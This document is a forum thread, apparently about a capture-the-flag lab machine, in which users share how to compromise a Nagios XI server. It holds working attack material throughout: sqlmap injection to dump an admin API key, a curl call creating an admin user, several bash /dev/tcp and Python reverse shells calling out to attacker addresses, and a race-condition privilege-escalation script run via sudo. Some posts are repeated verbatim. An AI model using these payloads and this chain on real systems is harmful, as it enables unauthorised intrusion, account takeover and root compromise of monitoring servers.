[devMRT]

any hint on what to look into after getting the nagios panel using svc creds?

Try finding an sql injection vulnerability and dumb those tables

Do we need the svc user's token to perform SQL injection? I'm having trouble getting SQL injection to work on the banner URL

That's what you need to work on, that damned banner ajax url... but but but, you need a proper cookie for it.

That auth token is not enough for injection. But it is enough to login to the endpoint. You need to login and grab the proper cookie, use that with sqlmap.

It should make sense.

how u know that  banner ajax url accept auth token from api ? also how u found that api endpoint?

---

get the admin api_key which you have in xi_users in sqlmap to add new user with admin privilege --> login with the created user with admin privileges, add cmd --> rev shell, gg

I can add users, how do you add them as admins? I've tried a few parameter with no luck

add admin user like this

curl -X POST "http://{IP}/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=test&password=test&name=test&email=test@LocalHost&auth_level=admin"

how u find out this `auth_level` paramter

[rootisbetter]

i still cant get the shell ....

i cant  vi /usr/local/nagios/bin/npcd because i cant get a stable shell, so i uploaded own npcd file:

#!/bin/bash

bash -i >& /dev/tcp/10.10.x.x/9002 0>&1


run  sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd

and nothing

for stable shell :
Ctrl-Z on your nc connection
stty raw -echo
fg
reset
export TERM=xterm
ssty -a
stty rows <num> columns <cols>

[jahman]

Hello,

Here is my pricesc abusing a race condition

-1)

mv /usr/local/nagiosxi/tmp/migrate /usr/local/nagiosxi/tmp/migrate.bak
mkdir /usr/local/nagiosxi/tmp/migrate

0) cat sploit.py

#!/usr/bin/env python
# coding: utf-8

import asyncore
import pyinotify  ## Download https://raw.githubusercontent.com/seb-m/pyinotify/master/python3/pyinotify.py and copy in the same directory of sploit.py
import os

wm = pyinotify.WatchManager()  # Watch Manager
mask = pyinotify.IN_ACCESS | pyinotify.IN_CREATE | pyinotify.IN_OPEN  # watched events

class EventHandler(pyinotify.ProcessEvent):
    def process_IN_CREATE(self, event):
        print("ca passe")
        if "nagios_unbundler.py" in event.pathname:
            os.system("cp /tmp/json.py /usr/local/nagiosxi/tmp/migrate")
            print("ca passe")

notifier = pyinotify.AsyncNotifier(wm, EventHandler())
wdd = wm.add_watch('/usr/local/nagiosxi/tmp/', mask, rec=True)
asyncore.loop()

1) cat /tmp/json.py

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.115",2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);

2) launch a listener

nc -nlvp 2222

2.) launch the race condition script

python sploit.py

3) Exploit:

sudo  /usr/bin/php  /usr/local/nagiosxi/scripts/migrate/migrate.php  badaboom

[heisenberrg]

Im curious how you guys found the api document for nagiosxi backend api, i didn't find any public api document for nagiosxi

---

Im curious how you guys found the api document for nagiosxi backend api, i didn't find any public api document for nagiosxi

nvm, i found the api doc on nagiosxi online demo. https://nagiosxi.demos.nagios.com

[ineedtopee]

i'll share full writeup 100% free tomorrow, i have rooted

Please do so waiting on it eagerly!!

[youssefm55]

Can anyone help please?

I am having trouble getting a reverse shell from configure > core config manager 

Command Name:
shell

Command Line: bash -i >& /dev/tcp/10.10.XX.XX/8080 0>&1

kali@root: nc -lnvp 8080

i save it and apply changes yet no result,

few things: 
- remove your ip address from this post and the post earlier (for your own safety).
- add New Command, as you did, save it, by Apply configurations.
- however use something like bash -c 'bash -i >& /dev/tcp/10.10.x.x/8080 0>&1'
- then add the check since you want to get it executed: Configure > Core Config Manager > Monitoring (left pane) > Services > Add new > select your newly created check command...
> then you will have Run Check Command there.

Damn bois, you get access & privesc and everything then when you succesfully get into a service you are getting lost with the options and buttons ....

Also try bash -c 'bash -i >& /dev/tcp/x.x.x.x/4444 0>&1'

hey my shell keeps disconnecting how do I stabilize it

[ineedtopee]

Can anyone help please?

I am having trouble getting a reverse shell from configure > core config manager 

Command Name:
shell

Command Line: bash -i >& /dev/tcp/10.10.XX.XX/8080 0>&1

kali@root: nc -lnvp 8080

i save it and apply changes yet no result,

few things: 
- remove your ip address from this post and the post earlier (for your own safety).
- add New Command, as you did, save it, by Apply configurations.
- however use something like bash -c 'bash -i >& /dev/tcp/10.10.x.x/8080 0>&1'
- then add the check since you want to get it executed: Configure > Core Config Manager > Monitoring (left pane) > Services > Add new > select your newly created check command...
> then you will have Run Check Command there.

Damn bois, you get access & privesc and everything then when you succesfully get into a service you are getting lost with the options and buttons ....

Also try bash -c 'bash -i >& /dev/tcp/x.x.x.x/4444 0>&1'

After using these steps when i apply the configurations I an getting an error : "An error occurred while attempting to apply your configuration to Nagios Core. Monitoring engine configuration files have been rolled back to their last known good checkpoint.


<div>Error: Service has no hosts and/or service_description (config file '/usr/local/nagios/etc/services/Gandu.cfg', starting on line 16)</div>"

Nagios Core 4.4.13
Copyright © 2009-present Nagios Core Development Team and Community Contributors
Copyright © 1999-2009 Ethan Galstad
Last Modified: 2023-06-01
License: GPL

Website: https://www.nagios.org
Reading configuration data...
  Read main config file okay...
Error: Service has no hosts and/or service_description (config file '/usr/local/nagios/etc/services/Gandu.cfg', starting on line 16)
  Error processing object config files!


***> One or more problems was encountered while processing the config files...

    Check your configuration file(s) to ensure that they contain valid
    directives and data definitions.  If you are upgrading from a previous
    version of Nagios, you should be aware that some variables/definitions
    may have been removed or modified in this version.  Make sure to read
    the HTML documentation regarding the config files, as well as the
    'Whats New' section to find out what has changed.


How can it be rectified, the command i am running is : bash -c 'exec bash -i &>/dev/tcp/10.XX.XX.XX/5555 <&1'

I understand that I have to make changes in the config file adding the hosts and service name but since I have no terminal access to the server I'm unable to edit the config file and even on the nagios web-interface i cannot locate where to add these values.

Any help appreciated.

[r0001]

SNMPWALK shows info

Sorry to bother with what may be a dumb question... (a noob here)
how could you identify that the machine has snmp? No ports of that sort were open during the nmap scan for me.

[ineedtopee]

SNMPWALK shows info

Sorry to bother with what may be a dumb question... (a noob here)
how could you identify that the machine has snmp? No ports of that sort were open during the nmap scan for me.

You aren't completely wrong there , Have you tried a UDP port scan via nmap as well??

[xlr]

anyone else still getting the Login error. Token expired??? and how do i get rid of it